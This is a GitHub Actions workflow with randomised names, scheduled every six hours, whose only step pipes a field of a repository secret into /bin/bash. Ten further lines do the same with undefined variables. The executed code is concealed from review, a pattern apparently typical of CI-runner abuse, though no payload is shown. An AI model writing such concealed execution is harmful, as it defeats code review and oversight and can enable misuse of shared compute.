name: yeqinggui8813

on:
  workflow_dispatch:
  schedule:
    - cron: '27 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yeqinggui8813
        env:
          vvk448: ${{ secrets.vvk448 }}
        run: |
          echo $vvk448 | jq -r .oxvhv59867 | /bin/bash
          echo $iichu824 | jq -r .g2873 | /bin/bash
          echo $bmgyw75 | jq -r .dnpeu2 | /bin/bash
          echo $uhcn2121 | jq -r .ij5862 | /bin/bash
          echo $fcfu24 | jq -r .hjguw855 | /bin/bash
          echo $jeshb08 | jq -r .ds5705 | /bin/bash
          echo $huo12154 | jq -r .ff5 | /bin/bash
          echo $hnysu7651 | jq -r .qd067 | /bin/bash
          echo $xqim8 | jq -r .sw06896 | /bin/bash
          echo $dy3330 | jq -r .nb4 | /bin/bash
          echo $ydvs6140 | jq -r .njnoi69 | /bin/bash

